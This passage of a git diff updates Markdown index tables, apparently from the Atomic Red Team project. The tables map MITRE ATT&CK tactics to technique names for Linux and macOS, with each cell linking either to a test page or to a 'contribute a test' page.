+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -61,13 +71,16 @@
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
+| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index f82dd981..952efc86 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -1,32 +1,32 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
